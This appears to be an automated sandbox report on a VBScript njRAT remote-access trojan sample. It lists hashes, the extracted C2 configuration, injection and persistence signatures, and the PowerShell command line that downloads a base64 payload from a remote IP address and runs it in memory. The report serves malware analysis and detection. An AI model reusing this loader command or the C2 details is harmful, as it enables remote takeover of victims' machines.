Analysis

max time kernel: 600s
max time network: 600s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 26/09/2022, 22:08

Static task: static1
Behavioral task: behavioral1
Sample: RATNJNEW.vbs
Resource: win7-20220812-en
General

Target: RATNJNEW.vbs
Size: 577KB
MD5: 0673849361f4aa0726bc1e4704c3dc4b
SHA1: 76acf5375646a1885c361ca1838fa00c8e721ee2
SHA256: b5732644184a1479c4fb17380de98dfa1ffe6135914aecdf960e34b96fd076bb
SHA512: e7f67d92bc4b2ba7382af9f46b7f2d59869c6f3730d96575ac73d2d1a561e7c5fc1a82cc7537b13fa8eadaa0240d19484401972bd6b1e0b950a15e9b980890e9
SSDEEP: 96:vHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHY:cKLosx0yRG
Malware Config

Extracted:
  http://20.7.14.99/dll/dll_ink.pdf

Extracted (njrat):
  njrat
  0.7NC
  NYAN CAT
  venomsi.mypsx.net:81
  4c6c9a1bbdc34e6ebe
  reg_key: 4c6c9a1bbdc34e6ebe
  splitter: @!#&^%$
Signatures

Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  7     1388  powershell.exe
  13    1388  powershell.exe

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                        Process
  Key value queried  \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation       WScript.exe

Drops startup file (1 IoCs)
  description   ioc                                                                                    Process
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk  powershell.exe

Suspicious use of SetThreadContext (1 IoCs)
  description                            pid   Process         procid_target
  PID 1388 set thread context of 3140    1388  powershell.exe  87

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid   Process
  1388  powershell.exe
  1388  powershell.exe
  4200  powershell.exe
  4200  powershell.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description                        pid   Process
  Token: SeDebugPrivilege            1388  powershell.exe
  Token: SeDebugPrivilege            4200  powershell.exe
  Token: SeDebugPrivilege            3140  RegAsm.exe
  Token: 33                          3140  RegAsm.exe
  Token: SeIncBasePriorityPrivilege  3140  RegAsm.exe
  (the remaining entries of the 64 alternate between the last two rows, all for PID 3140 RegAsm.exe)

Suspicious use of WriteProcessMemory (12 IoCs)
  description                        pid   Process         procid_target
  PID 5056 wrote to memory of 1388   5056  WScript.exe     83
  PID 5056 wrote to memory of 1388   5056  WScript.exe     83
  PID 1388 wrote to memory of 4200   1388  powershell.exe  85
  PID 1388 wrote to memory of 4200   1388  powershell.exe  85
  PID 1388 wrote to memory of 3140   1388  powershell.exe  87
  PID 1388 wrote to memory of 3140   1388  powershell.exe  87
  PID 1388 wrote to memory of 3140   1388  powershell.exe  87
  PID 1388 wrote to memory of 3140   1388  powershell.exe  87
  PID 1388 wrote to memory of 3140   1388  powershell.exe  87
  PID 1388 wrote to memory of 3140   1388  powershell.exe  87
  PID 1388 wrote to memory of 3140   1388  powershell.exe  87
  PID 1388 wrote to memory of 3140   1388  powershell.exe  87
Processes

C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RATNJNEW.vbs"
  PID: 5056
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('1f6af02f9651-8cc9-7024-3ac8-2284e82a=nekot&aidem=tla?txt.saCtarJN02%4602%esabF2%4602%esab/o/moc.topsppa.ooomiisiisipaug/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
    PID: 1388
    - Blocklisted process makes network request
    - Drops startup file
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs
      PID: 4200
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      PID: 3140
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads

Filesize: 2KB
MD5: 6cf293cb4d80be23433eecf74ddb5503
SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Filesize: 1KB
MD5: eedeb218af57d184b7a06908d84e1f4f
SHA1: da8c874abd286ac085f7105d3d9da30336b09509
SHA256: f514ecbc9a8915c19aab328ecb319f730ddaf6d6d35cbf7b67bcdd00a4a75d80
SHA512: 3be9e8b318be85f46692414419847147d9be948e0178962e95ce32899c52a6f26ec94e464a69770bc7a212681f24657222eae14646e484b2d0423076784ec29c